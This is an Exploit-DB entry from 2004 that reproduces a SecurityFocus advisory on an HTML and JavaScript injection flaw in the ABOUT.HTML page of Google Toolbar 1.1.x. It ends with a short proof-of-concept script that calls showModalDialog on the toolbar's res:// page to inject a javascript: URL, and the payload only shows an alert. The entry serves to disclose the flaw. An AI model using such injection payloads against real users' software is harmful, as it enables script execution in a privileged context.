Google Toolbar 1.1.x - About.HTML HTML Injection

EDB-ID:

24607


Author:

ViperSV

Type:

remote


Platform:

Windows

Date:

2004-09-17


source: https://www.securityfocus.com/bid/11210/info

Google Toolbar is reported prone to a HTML injection vulnerability. It is reported that the Google Toolbar 'ABOUT.HTML' page allows the injection of HTML and JavaScript code.

This vulnerability may allow an attacker to inject malicious HTML and script code into the about page of the vulnerable application.

<s c r i p t>
window.showModalDialog("res://C:\\Program%20Files\\Google\\GoogleToolbar1.dll/ABOUT.HTML",
"<div style=\"background-image:
url(javascript:alert(location.href));\">");
</s c r i p t>